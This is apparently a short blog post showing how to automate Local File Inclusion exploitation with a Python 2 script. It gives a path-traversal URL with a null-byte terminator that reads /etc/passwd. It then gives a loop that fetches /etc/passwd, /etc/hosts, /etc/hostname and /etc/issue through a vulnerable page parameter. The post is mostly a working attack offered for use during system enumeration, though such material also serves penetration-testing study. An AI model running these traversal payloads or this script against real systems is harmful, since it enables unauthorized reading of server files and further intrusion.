Python: Automating Local File Inclusion (LFI)
- by Vince
-
in Blog
-
Hits: 2931
The first time you find a page with a Local File Inclusion (LFI) vulnerability, it's like magic. You feed your string in the browser:
http://192.168.150.150/vulnerable.php?page=../../../../../../../../etc/passwd%00
... it spits back the contents of /etc/passwd, you're excited, and you continue enumerating the system.
The last time you found a local file inclusion vulnerability and you had to enumerate the system through a browser, it was tedious and you were probably pulling your hair out. Let's take the browser out of the equation.
There are a number of ways to automate this process, I've picked Python.
#!/usr/bin/python
import urllib2
host = ("http://192.168.150.150/vulnerable.php?page=../../../../../../../../..")
path = list(("/etc/passwd%00", "/etc/hosts%00"))
path.append("/etc/hostname%00")
path.append("/etc/issue%00")
for x in path:
print ("-" * 200)
print (x)
print ("-" * 200)
print urllib2.urlopen(host + x).read()
Basically, we're retrieving /etc/passwd, /etc/hosts, /etc/hostname, and /etc/issue. I could have put them all on one line but I wanted to show how it could be done by appending the list. Plus I like things clean and the idea of the path scrolling across the page would bug me.
I added a separator which is 200 dashes, the name of the file were retrieving, and 200 more dashes.
Depending upon what is vulnerable, I've seen the output look really clean and I've also seen it where it's really dirty. But you still have your divider and it's no different than viewing HTML source.